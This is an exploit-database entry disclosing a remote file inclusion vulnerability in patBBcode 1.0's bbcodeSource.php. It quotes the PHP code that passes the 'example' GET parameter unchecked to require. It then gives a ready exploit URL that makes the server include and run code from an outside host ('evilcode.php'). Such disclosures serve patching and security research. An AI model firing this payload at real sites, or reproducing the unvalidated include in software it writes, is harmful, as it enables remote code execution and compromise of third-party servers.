patBBcode 1.0 bbcodeSource.php Remote File Inclusion Vulnerability

2007-11-12T00:00:00
ID 1337DAY-ID-2281
Type zdt
Reporter p4sswd
Modified 2007-11-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
patBBcode 1.0 bbcodeSource.php Remote File Inclusion Vulnerability
==================================================================



Link to download:
http://www.php-tools.net/site.php?file=patBBCode/overview.xml

Vuln file:
examples\patExampleGen\bbcodeSource.php

Vuln code:
    if( !isset( $_GET['example'] ) )
        die( 'No example selected.' );
   
    $exampleId = $_GET['example'];

    ob_start();

    // make the example think it's still in the right place
    chdir( '../' );
   
    // include the example
    require $exampleId.'.php';
   
    ob_end_clean();

Exploit:
examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php




#  0day.today [2018-02-20]  #